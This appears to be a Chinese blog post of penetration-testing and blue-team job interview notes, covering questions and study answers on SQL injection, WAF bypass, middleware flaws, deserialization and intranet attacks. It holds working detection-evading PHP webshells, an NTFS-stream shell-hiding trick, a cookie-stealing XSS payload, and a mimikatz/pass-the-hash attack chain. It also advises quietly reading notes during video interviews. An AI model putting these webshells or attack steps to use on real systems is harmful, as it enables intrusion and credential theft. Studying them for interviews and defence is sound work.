赞
踩
HR:先来个自我介绍
I:xxxxxx(第一次的自我介绍,不是说的很好,就不写啦)
HR:然后看你这边是熟悉sql注入漏洞这些是吧,像常见的报错注入的函数有哪些
I:报错注入的函数啊,就比如像X-forword-for,就还有一个更新路径的函数,就那个update的那个,就还有一个floor(不是回答的很好)
*常用的报错注入的函数:
floor()函数、
exp()函数、
updatexml()函数、
join()函数、
extravalue()函数等
hr:那比如说,就if盲注的一个过程当中,就基于时间的一个盲注,就sleep被过滤的情况下,你会怎么去进行一个绕过
I:就是进行盲注的时候,那个sleep被过滤了是吗?
hr:对对对
I:。。。它被过滤的话就,就可能要去绕WAF,或者换一些函数,然后就也可以看看能不能用反引号之类的绕过
hr:就除了反引号,你还有其他的一些方法吗
I:这个绕WAF。。。就。。。就可以给它弄一些那个内联注释,还有xxxxx
*绕sql的常见手法:
参数污染
内联注释
大小写绕过 (很老的WAF才有用)
替换绕过 (很老的WAF才有用)【和上传文件那个pphphp一样】
特殊符号绕过 (%0a换行)``
编码绕过 (比如会多次解码的东西,例如我们DOM XSS绕狗那个)
等价替换 (利用其它函数替代)[union #%0aselect 拦截][union all #%0aselect 不拦截]
容器特性(例如Apace的Hpp,或者是IIS的%分割)
白名单(管理员权限或者是127.0.0.1本地访问不拦截)
缓存区溢出 (数据太多了,超出了WAF检测的范围)
hr:那如果说,现在有一个文件上传的一个场景,它后端是白名单,WAF是黑名单的个情况,你觉得这个情况要怎么绕过
I:xxx
hr:就程序它后端的一个判断逻辑是判断你的一个后缀是否为一个图形的一个文件,但是它同时有一层有WAF的一个过滤,就是WAF它会拦截你上传的一个后缀,你觉得这个情况可以进行一个绕过吗
I:xxx
你们做过的话,就会知道,这里就不写了
中间件漏洞:
常用web中间件漏洞(随便找的~哈哈哈):https://www.freebuf.com/articles/web/192063.html
(一) IIS(php中间件漏洞)
1、PUT漏洞
2、短文件名猜解
3、远程代码执行
4、解析漏洞 目录以.asp结尾 xxx.asp;1.jpg
(二) Apache(php中间件)
1、解析漏洞 1.php%0a换行解析 1.php.xxx 未知后缀解析
2、目录遍历
(三) Nginx(php中间件)
1、文件解析
2、目录遍历
3、CRLF注入 (Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞)
4、目录穿越 (nginx配置别名的时候alias的时候,忘记加/ 将造成目录穿越漏洞)
5、解析漏洞 1.jpg/.php
(四)Tomcat(java中间件)
1、远程代码执行
2、war后门文件部署
(五)jBoss
1、反序列化漏洞
2、war后门文件部署
(六)WebLogic(java中间件漏洞)
1、反序列化漏洞
2、SSRF
3、任意文件上传
4、war后门文件部署
(七)其它中间件相关漏洞
1、FastCGI未授权访问、任意命令执行
2、PHPCGI远程代码执行
大佬写的SRC文章:[限时投稿]SRC快速入门+上分小秘籍+实战指南- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:嗯。。。那么看你这边的话是有公益SRC的挖掘,那么是两个官网测试的高危漏洞是什么类型的呢(这个看自己挖的漏洞了)
I:xxx
hr:然后看你这边是有webshell的一个绕过手法,那你一般会怎么样去进行一个webshell的绕过呢
I:xxx
hr:就它程序后端,它就只是会去拦截你的eval,或者就REQUEST(听的不是很清楚不知道是不是)
I:xxx
hr:xxx(还有但是跑题了,总之是问webshell绕过)
*绕防护软件/某些设备/webshell的常见手法:
通过常量定义:
<?php define("a","$_GET[1]");eval(a);
通过字符串拼接 + 双美元符号:
<?php
$a='ass';
$b='ert';
$funcName=$a.$b;
$x='funcName';
$$x($_REQUEST[1]); # 用不了,就加个@符号
通过函数定义强行分割:
<?php
function a($a){
return $a;}
eval(a($_REQUEST)[1]);?>
通过类定义,然后传参强行分割:
<?php
class User
{
public $name = '';
function __destruct(){
eval("$this->name");
}
}
$user = new User;
$user->name = ''.$_REQUEST[1];
?>
多方式传参免杀:
<?php
$COOKIE = $_COOKIE;
foreach($COOKIE as $key => $value){
if($key=='assert'){
$key($_POST['s'];)
}
}
?>
<?php
$a=get_defined_functions();
$a['internal'][841]($_GET['a']);
拿到shell之后藏shell的妙招:ntfs文件流
<?php include('/:123.txt')?> + echo "<?php eval($_REQUEST[a])?>" >> /:123.txt
通过连接云主机数据库(我自己取的名字,因为风哥没说~哈哈):
绕过市面上所有WAF(终极手法)
<?php
eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('127.0.0.1','root','root','maoshe'),'select * from info'))['info']);
hr:看你这边是了解过一些代码审计是吧,那像本地或者远程文件包含的一些函数的话,是有哪些呢,能够导致文件包含漏洞的一个函数
I:xxx
代码审计两种方式:
1.全文通读(工程量浩大,耗时耗力) bluecms
2.危险函数定位法(主流方法):
1)<?php
eval($_REQUEST[8]) 8=phpinfo();
?>
2)<?php
assert($_REQUEST[8]) 8=phpinfo();
?>
3)file_put_contents('123.php','<?php var_dump(1);var_dump(2);phpinfo();?>'); 8=phpinfo();
4)<?php
echo preg_replace('/a/e',$_GET[8],'abc'); 8=phpinfo();
?>
5.1)<?php
$a = create_function($a,$_REQUEST[8]); 8=phpinfo();
$a();
?>
5.2)<?php
create_function($a,$_REQUEST[8]); 8=phpinfo();
?>
i 在底层代码运行是这样
v
function 函数名(形参){要执行的代码}
<?php
function a($a){};eval('phpinfo();');//} 8=};eval('phpinfo();');//
?>
6)<?php
array_map('assert',array($_REQUEST[8])); 8=phpinfo();
?>
7)<?php
"${phpinfo()}"; //php5.5以上的版本才有 "${要执行的代码}"
?>
<?php
"${eval($_REQUEST[8])}" 8=phpinfo();
?>
在PHP存在诸多函数可以做到命令执行。
1、system('whoami');
PHP会操纵计算机执行whoami的命令,且输出并返回结果
2、echo exec('whoami')
PHP会去操纵计算机执行whoami的命令,且获取最后一行数据
3、echo shell_exec('whoami')
PHP会去操纵计算机执行whoami的命令,且获取所有数据
4、passthru('whoami')
只调用命令,把命令的运行结果原样地直接输出到标准输出设备
5、特殊符号,反引号 ` xxx ` => echo `whoami`; 反引号其实就是调用的shell_exec()函数
6、popen(要执行的命令,参数); r是只读、w是写入
$a = popen('whoami','r'); 在cmd里面执行whoami,把内容读(r)取出来,放在变量a里面
echo fread($a,1024); 输出(echo)读取(fread)到的内容,并且长度限制为1024
这个执行的返回值比较特殊,返回的是一个文件指针,需要用fread去读取返回值。
对于渗透测试人员而言,返回值并没有那么重要,核心是代码的确已经执行了,这个才是重中之重。
文件包含:
两个函数
include:用到的时候临时调用
require:运行前就先调用,整合后一齐执行
require_once\include_once: 文件只能包含一次
***最大的区别:如果包含不存在的文件的时候,include会往下继续执行,require不会
1、文件包含:可以让任意文件当作PHP运行
2、文件包含:可以突破网站根目录,计算机上任意文件都可以当作PHP文件执行
后端语言要执行,必须放在网站根目录
文件包含:
1、LFI(local file include):本地文件包含(只能包含自己电脑上的东西哦)
2、RFI(remote file include):远程文件包含(可以包含任何访问到的东西)
经常引发变量覆盖漏洞的函数有:extract() parse_str() import_request_variables()
extract()函数(作用:将数组中将变量导入到当前的符号表)
给一个实例:
<?php
$a = "1";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>
运行结果:$a = Cat; $b = Dog; $c = Horse
extract()函数(作用:从数组中将变量导入到当前的符号表)
__FILE__:获取当前文件路径
show_source():显示文件源码
print_r():可以输出非字符串
PHP之十六个魔术方法详解__method php参数-CSDN博客
<?php foreach($todos as $todo):?>
foreach:数组遍历 $todos 塞到 $todo
绕WAF:
<?=$todo?>----------------------------特殊写法,被当做php代码执行
=> <?php echo $todo;?>
<?phpinfo();?> 但是短标签风格需要修改配置文件手动开启
反序列化:
Weblogic 反序列化漏洞 //工作
HR:做过反序列化漏洞吗?
me:做过,靶场做过
HR:有没有实战做过?
me:做过,我研究过Weblogic 反序列化漏洞
phar:// 伪协议(把反序列化,做大做强2) //CTF
hr:如果你拿到一个webshell之后,如果它是一个WWW的一个权限,像你在这边你利用烂土豆提权的话,你要怎么样去判断它提权成功呢
I:xxx
whoami,创建一个用户
提不成功就基于烂土豆提权,或者用其他的exp(在内网渗透的课,风哥会讲)
hr:看你这边是有一个内网的一个实战的经验是吧
I:xxx
hr:对域渗透比较熟悉是吧
I:xxx
内网渗透(简历模板自带的):
拿到 webshell 后进入后台,利用烂土豆提权,创建新用户,并提权为管理员权限,使用 reGeorg 正
向连接打入内网,使用 proxififier 设置代理,远程登录目标站点,上传 nmap,查找内网机器,利用猕猴桃把服务器
的管理员账户密码给提取出来,由于内网机器存在相同的管理员账户密码,就成功渗透进去。横向渗透,找到域控主
机,利用猕猴桃 hash 传递,拿到域控主机权限,也拿到了黄金票据。
这个大佬也写了怎么说内网渗透的,这个看情况自己选择吧
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
1.hr:假如现在一个场景,你从外网拿到一个webshell,然后你进入到内网,你发现那台机器是一台域内的机器,然后接下来呢,你要去拿域控嘛,那你要怎么样去定位这个域控的IP呢
I:xxx
2.hr:像你刚刚说的,就你通过猕猴桃去进行一个哈希传递是吧,它是会进行一个弹窗,但是你现在你没有它ADP桌面权限的一个情况的下,你怎么去操作呢
I:xxx
hr:就是你没有它远程桌面的权限
I:xxx
3.hr:那你除了用猕猴桃去抓目标哈希之外,你还有使用其他的吗
I:xxx
hr:就是你除了用猕猴桃去抓目标哈希之外,你还使用过其他的方式,去抓目标机器的账号密码吗
I:xxx
4.hr:那你说说黄金票据和白银票据的区别是什么
I:xxx
5.hr:那黄金票据它伪造的是那个账号的权限呢
1.域控IP看DNS
2.通过域控内的跳板机,找到域控的账号密码,在去远程连接(小伙伴们有其他的思路也可以在评论区写一下,感~谢~~啦)
3.这个真不知道,知道的小伙伴可以在评论区写下,感谢!
4.++
1.白银票据是一个有效的票据授予服务(TGS)Kerberos票据,因为Kerberos验证服务运行的每台服务器都对服务主体名称的服务帐户进行加密和签名。
2.黄金票据是伪造TGT并且有效的获得任何Kerberos服务,而白银票据是伪造TGS。
5.特殊用户:krbtgt
hr:你通过python有做过安全方面的哪些东西呢
I:没弄过,简历上面的python爬虫是课设
hr:假如你现在发现了一个XSS嘛,然后你想让它进行一个弹窗,但是现在你发现alert这个函数用不了的情况,你会怎么去进行一个绕过呢
I:xxx
XSS绕过:
1.大小写
2.js伪协议
3.没有分号
4.Flash
5.Html5新标签
6.Fuzz进行测试
7.双层标签绕过
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:你挖到过哪些有意思的逻辑漏洞呢
I:目前没挖到过
逻辑漏洞:
越权漏洞,密码修改,密码找回,验证码漏洞,支付漏洞,投票/积分/抽奖,短信轰炸
hr:你代码审计做的比较多是吧,那你自己有独立审计过CMS吗
I:xxx
BlueCMS有时间可以审计,比较适合新手
hr:那现在就比如有一个最基本的语句union select 1,2,3,现在被WAF拦截了,你会怎么去绕过
I:xxx
*绕sql的常见手法:
参数污染
内联注释
大小写绕过 (很老的WAF才有用)
替换绕过 (很老的WAF才有用)【和上传文件那个pphphp一样】
特殊符号绕过 (%0a换行)``
编码绕过 (比如会多次解码的东西,例如我们DOM XSS绕狗那个)
等价替换 (利用其它函数替代)[union #%0aselect 拦截][union all #%0aselect 不拦截]
容器特性(例如Apace的Hpp,或者是IIS的%分割)
白名单(管理员权限或者是127.0.0.1本地访问不拦截)
缓存区溢出 (数据太多了,超出了WAF检测的范围)
hr:你CS生成的木马怎么去绕过火绒,360之类的防护软件
I:xxx
我现在觉得,能够绕过去就行了,CS和msf的话,看自己的需求
怎么说呢,我是没有准备就去面试(线上)了,什么资料什么的看都没看,反正面上了也不会去。总之以后的话,要做好准备了在去面试。
hr:CSRF和SSRF有什么区别?
I:CSRF(跨站/客户端请求伪造) => 浏览器因为JS偷偷发送数据包
SSRF(服务器端请求伪造)=> 服务器因为你传的参数偷偷发送数据包
C or S => C客户端(client)s服务端(server)
hr:你说一下sql注入有哪些类型
I:xxx
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:你了解过哪些安全设备
I:xxx
hr:你刚才说到了WAF,那你知道WAF它有哪些具体的拦截方式吗
I:xxx
我标红线的,都是我这六次面试中问到的,其他的看自己的情况去了解吧。
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
hr:你用过天眼没有
I:xxx
我第一次参加HW,反正我是没用过
hr:那你说一下,你刚才提到的蚁剑啊、菜刀啊、哥斯拉啊、冰蝎啊的流量特征
I:xxx
还有wireshark的,咱们学长也写了
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:你用过wireshark对流量进行溯源过吗
I:xxx
我当时是读咱们学长的,其他大佬写的也可以,这个看自己的选择(我觉得说具体的步骤会好一点)
HW蓝队面试,长亭- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
蓝队面试知识点整理_一个大范围的0day被曝光-CSDN博客
1.hr:你有没有了解过代码审计
I:xxx
2.hr:你有用过代码审计的相关工具吗
I:xxx
1.我当时是说复现过一些通杀漏洞,这个学过的都知道
2.seay(课件里面有)
hr:你说一下内网渗透的一些思路吧
I:xxx
hr:横向提权和纵向提权有啥区别(这个和越权是分开的,越权是用户改用户_用户改管理员)
I:横向是获取更多同权限账户,纵向是获取更高权限账户
内网渗透(就业课课件里面有):
拿到 webshell 后进入后台,利用烂土豆提权,创建新用户,并提权为管理员权限,使用 reGeorg 正
向连接打入内网,使用 proxififier 设置代理,远程登录目标站点,上传 nmap,查找内网机器,利用猕猴桃把服务器
的管理员账户密码给提取出来,由于内网机器存在相同的管理员账户密码,就成功渗透进去。横向渗透,找到域控主
机,利用猕猴桃 hash 传递,拿到域控主机权限,也拿到了黄金票据。
看自己的选择吧
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
后面就没有了,就说了下期望薪资是多少,然后到现在都在等二面,快的话6月初,慢的话6月中旬
通过了。目前就是在等二面,然后可以和厂商说自己想去那个城市(默认就近安排),或者多面一下其他的hw,或者公司涨涨经验
面试的时候,如果你收集的页面比较多的话,可以像我这样给它们分类,自带的浏览器可以,谷歌的好像不行(我不知道是不是要装插件之类的)
是同一家公司,第一次(4月23日)的时候,她问我什么时候到岗,我说最迟要明年,然后就等明年在接着面了。
然后今天(5月24日)我跟她说6月中旬就能去,然后就又面试了。
hr:你知道常见的反序列化漏洞有哪些吗
I:xxx
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
hr:你有没有实战攻防演习经验呢/红蓝对抗/护网
I:xxx
我目前没有参加过,但是可以看看别人说主要是干些什么
2022护网日记,护网工作内容、护网事件、告警流量分析_护网研判分析-CSDN博客
hr:给你一个银行,你怎么收集资产
I:xxx
信息收集的话,可以大概说一下
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:你用过DNSlog吗
I:xxx
DNS注入嘛,学过的都知道
登录 - Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:你在哪些SRC平台上面提交过哪些漏洞
I:xxx
这个看自己了,这没办法
hr:你挖过银行方面的漏洞吗
I:目前没挖到过
逻辑漏洞:
越权漏洞,密码修改,密码找回,验证码漏洞,支付漏洞,投票/积分/抽奖,短信轰炸
哎,我要是说6月中旬能去,现在就已经有offer了,也不会像现在这样过了一个月又面一次。算~啦,就当~经~~验。
hr:先自我介绍一下
I:面试官你好,我叫xxx,来自xxxxxx是一名大二在校生,学的专业是计算机网络技术,在校期间我参加过python程序设计实验室,编写过简单的python爬虫脚本(如爬取豆瓣数据之类的)。
专业技能的话,我熟悉常见的web漏洞和渗透测试工具的使用,然后我利用所学的专业技能,在漏洞盒子上提交过一些漏洞。
我个人比较认真负责,喜欢和志同道合的人研究技术,每天都会锻炼,去预防职业疾病。
最后,综上,我认为我的校园学习,我所掌握的能力,以及我做过的项目。我能够胜任这个渗透测试工程师的岗位。
我的自我介绍完毕。
hr:你在漏洞盒子上提交的漏洞是哪些
I:xxx
这个要看自己了
1.hr:sql注入的类型你知道吗
I:xxx
hr:那堆叠注入有了解过吗
I:xxx(可以连着用反弹注入)
2.hr:时间盲注你会用到哪些函数
I:xxx
1.:https://bbs.zkaq.cn/t/6709.html
2.盲注如果sleep()函数禁用,你怎么办: wz
比如benchmark()函数(就晓得一个)
hr:对于sql注入你一般用到的工具是哪些(这个是看自己挖漏洞时用到的工具)
I:xxx
hr:那对于Apache的中间件漏洞,你知道有哪些
I:xxx
hr:IIS呢
中间件漏洞: wz
常用web中间件漏洞:https://www.freebuf.com/articles/web/192063.html
(一) IIS(php中间件漏洞)
1、PUT漏洞
2、短文件名猜解
3、远程代码执行
4、解析漏洞 目录以.asp结尾 xxx.asp;1.jpg
(二) Apache(php中间件)
1、解析漏洞 1.php%0a换行解析 1.php.xxx 未知后缀解析
2、目录遍历
(三) Nginx(php中间件)
1、文件解析
2、目录遍历
3、CRLF注入 (Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞)
4、目录穿越 (nginx配置别名的时候alias的时候,忘记加/ 将造成目录穿越漏洞)
5、解析漏洞 1.jpg/.php
(四)Tomcat(java中间件)
1、远程代码执行
2、war后门文件部署
(五)jBoss
1、反序列化漏洞
2、war后门文件部署
(六)WebLogic(java中间件漏洞)
1、反序列化漏洞
2、SSRF
3、任意文件上传
4、war后门文件部署
(七)其它中间件相关漏洞
1、FastCGI未授权访问、任意命令执行
2、PHPCGI远程代码执行
hr:内网有了解过吗
I:xxx
hr:那你说一下你怎么搭建内网渗透的渠道
I:xxx(这个你们做过的话就会知道)
hr:那你知道这是正向连接,还是反向连接吗
I:xxx
hr:那你当时靶场是在局域网内的是吗
I:xxx(我当时是说局域网的,然后又想了一下,咱们靶场是访问猫舍的,然后应该是通过外网打入之后,进行内网渗透的,我不太记得了~哈哈哈)
hr:你说一下这个APP绕过防抓包是怎么做的
I:xxx(就是怎么绕过防御方法)
有攻自然有防(既然抓包可以找漏洞,测数据,那么自然也有防御手段)
常见的防御手段:
1、证书校验(其实就是https,我们用burp的证书就可以绕过)
2、代理屏蔽(使用okhttp框架,里面可以设置无代理模式,不走系统代理)最常见。
代理屏蔽:通过代理软件来绕过(VPN:数据连接技术)
3、单向认证,证书绑定(SSL pinning 单边校验)
HR:遇到hook怎么办?
I:用这个工具就可以了(JustTrustMe)
HR:这个不行怎么办?
I:去hook
HR:怎么hook
I:我没干过,我代码不太行,但是我用这个工具我会 -- 问单向认证怎么绕过,就说用这个工具(JustTrustMe)就行了
4、双向认证(安卓并不是很常见)
有很多小伙伴看到Burp无法抓包,就说用了双向认证或者是其他协议,其实这是不对的。双向认证会影响服务器的性能,其实在安卓中并不常见,代理屏蔽是现在最常见的情况。
hr:那java的反序列化漏洞你知道的有哪些
I:xxx
hr:那反序列化的漏洞原理,你知道吗
I:序列化 serilize就是把网页中的对象数组元素转化为字节的形式储存起来 反序列化 unserilizze就是把储存起来的字节再转化为原来的数组对象 ,这时候就得提到一些魔术方法,construct(),toString() 如果能控制反序列化的内容就能造成危害,差不多就是这样【咱们学长的,只不过我找不到ta的文章了~哈哈_我读起来比较顺口,所以就这样写了】
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
hr:那代码审计的流程你知道吗
I:xxx
我觉得这个比较顺口
hr:那你说一下你的渗透思路
I:xxx
hr:
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:文件上传的绕过方式你知道的有哪些
I:xxx
hr:你说的基本上都是黑名单的绕过方式,那白名单的呢
I:xxx(文件上传的靶场从第11关开始,后面的都是白名单的绕过方式
这里大概说一下,因为我当时面试时,说的不是很全,所以在这里写一下
1.CGI解析漏洞
2.ASP
3.文件包含(这个是我自己猜的一个场景,看目标的功能)
4.条件竞争
5.%00截断和00截断
6.CSRF(这个是我自己猜的一个场景,看目标的功能)
7.图片马绕过
8.在图片里面直接写木马语句
)
我当时大概说了一些
登录 - Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
后面就没有了,然后就说了一下入职之后其他的问题,这个等你们面试时就会知道了
怎么说呢,失败乃是成功之母。所有的成功都是建立在失败之上的。
所以多投简历,多面试就会知道问什么了。
hr:自我介绍一下
I:面试官你好,我叫xxx,来自xxxxxx是一名大二在校生,学的专业是计算机网络技术,在校期间我参加过python程序设计实验室,编写过简单的python爬虫脚本(如爬取豆瓣数据之类的)。
专业技能的话,我熟悉常见的web漏洞和渗透测试工具的使用,然后我利用所学的专业技能,在漏洞盒子上提交过一些漏洞。
我个人比较认真负责,喜欢和志同道合的人研究技术,每天都会锻炼,去预防职业疾病。
最后,综上,我认为我的校园学习,我所掌握的能力,以及我做过的项目。我能够胜任这个渗透测试工程师的岗位。
我的自我介绍完毕。
hr:你会内网渗透吗
I:xxx
我当时就说了会,然后没有说内网渗透的思路。
我感觉说出来好一点,不要等到hr问,那怎么内网渗透?然后在说,我感觉这样不太好
hr:说一下你对sql注入漏洞的理解
I:xxx
hr:那修复方式呢
I:xxx
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:你会哪些编程语言
I:php,python
hr:你会代码审计吗
I:xxx(前面写过啦,就不写啦)
hr:你说一下CSRF和SSRF有什么区别
I:xxx
hr:你觉得CSRF和SSRF那个危害跟大一些
I:xxx
hr:那SSRF有没有主要利用手法/组合利用手法/漏洞组合
I:xxx(反正我理解成危害的,我觉得理解成危害顺口。因为我记得当时风哥也说是危害,然后我就理解成危害了,面试时hr说漏洞组合[你听过SSRF的课的话,就会知道我为什么没有反应过来了]我没反应过来,然后这个就没有说好~呜呜呜)
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:反序列化漏洞有没有了解过
I:xxx
hr:那你可以讲一下log4j反序列化的原理或者复现吗
I:xxx
hr:那Shiro-550你有没有了解过
I:xxx
hr:那Fastjson的反序列化漏洞你有没有了解过
I:xxx
hr:那你说一下你对反序列化漏洞的一个理解
I:序列化 serilize就是把网页中的对象数组元素转化为字节的形式储存起来 反序列化 unserilizze就是把储存起来的字节再转化为原来的数组对象 ,这时候就得提到一些魔术方法,construct(),toString() 如果能控制反序列化的内容就能造成危害,差不多就是这样
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
hr:应急方面有没有了解
I:xxx
我是比较习惯这样说应急响应的流程的
蓝队面试知识点整理_一个大范围的0day被曝光-CSDN博客
windows应急响应;并不是唯一选,我只是习惯这样说
HW蓝队面试,长亭- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
linux应急响应;并不是唯一选,我只是习惯这样说
hr:那流量分析有没有了解
I:xxx
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:你有没有用过某个厂商的安全设备
I:xxx
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
像SSRF的危害/漏洞组合,内网渗透的思路/流程,和框架漏洞,知道的情况下,尽量说全。
能背下来就背下来,背不下来就对着笔记读。反正就算视频面试的话,hr也不知道你是不是读着电脑读的,ta只管你会不会,才不会去管你怎么会的【狗头保命】,反正尽量不看电脑的情况下说出来,因为线下的话,就没有电脑看了。
1.hr:你有没有挖过SRC,或者有没有跟老师做过项目之类的
I:xxx
2.hr:你挖到的这四个高危漏洞分别是什么呢
I:xxx
3.hr:那你说一下Mysql,Mssql,Oracle然后分别getshell的方式有哪些呢
I:xxx
4.hr:那你写文件的话,要知道绝对路径吧,那你有什么方法知道绝对路径
I:xxx
1.看自己有没有挖到了
2.看自己
3.
3.1:Mysql
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
3.2:Mssql
利用MSSQL getshell_mssql写shell-CSDN博客
3.3:Oracle
oracle进行getshell_oracle注入getshell-CSDN博客
Oracle的getshell命令执行的实战(有版本限制)_oracle注入getshell-CSDN博客
4.在传参哪里搞一个数组(风哥说过的)
hr:那你这三个sql注入(挖到的漏洞)分别是获取什么权限的呢
I:xxx
hr:你挖漏洞是手工的,还是sqlmap的,还是。。。
I:手工
hr:那sqlmap会用吗
I:xxx
hr:sqlmap它有个--os-shell 你知道它的原理是什么吗
I:xxx
hr:说下你挖到的文件上传漏洞
I:xxx(他没有问我绕过之类的,就是问我上传的木马文件是什么【图片马】)
hr:你说你本地有WEB测试环境的搭建与测试流程,是比卡丘,dvwa,sql天梯这些吗,还是说什么
I:xxx(当时没说出来,有点忘了)
咱们学的是这三个,其他的有没有,我不太记得了
hr:那像这些XXS,SSRF这些应该都了解过是吧
I:xxx
1.hr:那我们就过一些简单的吧,那你就说XSS的话,比较简单的payload有哪些呢
I:xxx
hr:那比如说img标签它可以payload吗
I:xxx(可以的,反正我当时说出来了~哈哈哈)
hr:就是怎么样才能让它(XSS平台的图片)执行,怎么样才能让它不执行
I:xxx(这个你们看过存储型XSS的课,就会知道了)
1.我当时是先说了<script>alert(document.cookie)</script>这个
然后在说了;标签型,事件型,伪协议,还有XSS平台的攻击语句
hr:那像内网渗透你了解过哪些呢
I:拿到 webshell 后进入后台,利用烂土豆提权,创建新用户,并提权为管理员权限,使用 reGeorg 正
向连接打入内网,使用 proxififier 设置代理,远程登录目标站点,上传 nmap,查找内网机器,利用猕猴桃把服务器
的管理员账户密码给提取出来,由于内网机器存在相同的管理员账户密码,就成功渗透进去。横向渗透,找到域控主
机,利用猕猴桃 hash 传递,拿到域控主机权限,也拿到了黄金票据。
hr:嗯。。。你这说的一般都是靶机对吧
I:xxx
hr:实际环境有做过吗
I:xxx(我记得好像,没有授权是违法的)
我不知道SRC的内网渗透行不行
都看到了吧,hr问我有没有实际环境做过,做都没得做,哪来的实际经验啊。哎,太难咯
hr:就比如说。嗯,因为你这个大部分都是靶机的一套流程嘛,那就比如说,你通过外网打入一个点,然后你去通过猕猴桃,扒出各种密码,但是很简单,这个当前这台机器,一般是dmz(隔离区),dmz大部分都是linux机器,linux机器是一般来说是不会加入到域里面的,所以你根本就拿不到域的账号,这个时候,你该怎么去打域呢
I:xxx(这我真不知道,知道的小伙伴可以在评论区写一下或者补充,感谢)
我记得msf的课,好像说过msf可以和CS一起用的,然后反弹shell的话,我记得好像说是windows的,linux的我好像没有看到过或者忘了。
没有的话,看看风哥能不能出一期这个类型的课吧@zkaq-nf
hr:比如说WEB,就说WEB渗透吧,WEB渗透你可以讲一下,你理解最深或者最透彻的漏洞,我们可以基于这个问一下
I:xxx(注意,我的建议是说自己最会的,不然的话。。。你懂的。
怎么看自己最会那个漏洞呢,你挖到的漏洞,那个最多,就是最会那个。
比如说如果你xxe挖的少或者没有挖到,然后你说你xxe理解的最透彻,
然后hr就会问xxe的一些其他东西,会的话还好,不会的话,那不是在搬起石头,砸自己的脚吗。大牛的话,当我放屁。)
1.hr:注入是吧,那odb注入了解过吗,数据外带
I:xxx
2.hr:或者一些绕过方式呢,绕安全狗这些了解过吗
I:xxx
3.hr:有真正绕过吗
I:xxx(哎,我当时应该说在虚拟机里面弄过的。虽然我只看过风哥演示过一遍【dogo】)
1.我不知道他说的odb注入是不是order by注入
https://www.cnblogs.com/1ink/p/15107674.html
2.
***绕sql的常见手法:wz
参数污染
内联注释
大小写绕过 (很老的WAF才有用)
替换绕过 (很老的WAF才有用)【和上传文件那个pphphp一样】
特殊符号绕过 (%0a换行)``
编码绕过 (比如会多次解码的东西,例如我们DOM XSS绕狗那个)
等价替换 (利用其它函数替代)[union #%0aselect 拦截][union all #%0aselect 不拦截]
容器特性(例如Apace的Hpp,或者是IIS的%分割)
白名单(管理员权限或者是127.0.0.1本地访问不拦截)
缓存区溢出 (数据太多了,超出了WAF检测的范围)
2.
***绕防护软件(比如D盾之类的)的常见手法:wz
通过常量定义:
<?php define("a","$_GET[1]");eval(a);
------
通过字符串拼接 + 双美元符号:
<?php
$a='ass';
$b='ert';
$funcName=$a.$b;
$x='funcName';
$$x($_REQUEST[1]); # 用不了,就加个@符号
------
通过函数定义强行分割:
<?php
function a($a){
return $a;}
eval(a($_REQUEST)[1]);?>
------
通过类定义,然后传参强行分割:
<?php
class User
{
public $name = '';
function __destruct(){
eval("$this->name");
}
}
$user = new User;
$user->name = ''.$_REQUEST[1];
?>
------
多方式传参免杀:
<?php
$COOKIE = $_COOKIE;
foreach($COOKIE as $key => $value){
if($key=='assert'){
$key($_POST['s'];)
}
}
?>
<?php
$a=get_defined_functions();
$a['internal'][841]($_GET['a']);
------
拿到shell之后藏shell的妙招:ntfs文件流
<?php include('/:123.txt')?> + echo "<?php eval($_REQUEST[a])?>" >> /:123.txt
------
通过连接云主机数据库:
绕过市面上所有WAF(终极手法)
<?php
eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('127.0.0.1','root','root','maoshe'),'select * from info'))['info']);
3.绕防护软件,还是可以绕的。
如果问到防护软件/安全软件之类的,就要问一下是不是D盾之类的防护软件,是的话,就对着上面读啦。
hr:你白盒审计的流程是怎么样的
I:xxx
hr:那你有没有用过漏扫工具,比如AWVS,Nessus之类的
I:xxx
hr:嗯。。。主要是你有没有用过呢,你知道归知道嘛,就你知道该怎么配置吗,该怎么用嘛,然后它扫出来大概有哪些结果,该怎么去复现这些。
I:xxx
hr:比如说绿盟,它漏扫它是有很多配置文件的,让你扫1到6535,你知道在哪配吗
I:xxx
hr:或者是AWVS,AWVS可以设置扫描时候cookie登入,这个你知道该怎么配置吗,有用过吗
I:xxx
Nessus的
https://www.iculture.cc/software/pig=25546
AWVS的话,私信我吧。我建议弄个win10
这个视频说了怎么装AWVS的
nessus_awvs_菜刀_蚁剑_哥斯拉_冰蝎安装使用_哔哩哔哩_bilibili
我是看这个装win10的
